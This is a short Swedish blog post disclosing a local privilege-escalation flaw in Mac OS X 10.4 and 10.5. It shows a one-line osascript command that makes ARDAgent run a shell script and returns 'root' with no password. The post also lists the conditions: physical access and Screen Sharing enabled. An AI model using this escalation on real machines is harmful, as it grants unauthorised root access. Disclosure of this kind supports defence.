just nu är 10.4 och 10.5 iaf sårbara för följande lokala exploit:
robin-engstroms-macbook-pro-15:~ re$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root
inget lösenord för att köra något som root, ingenting.
kräver dock fysisk access och att Screen Sharing är aktiverat (vilket är default på 10.5). funkar inte via SSH.
0 kommentarer:
Skicka en kommentar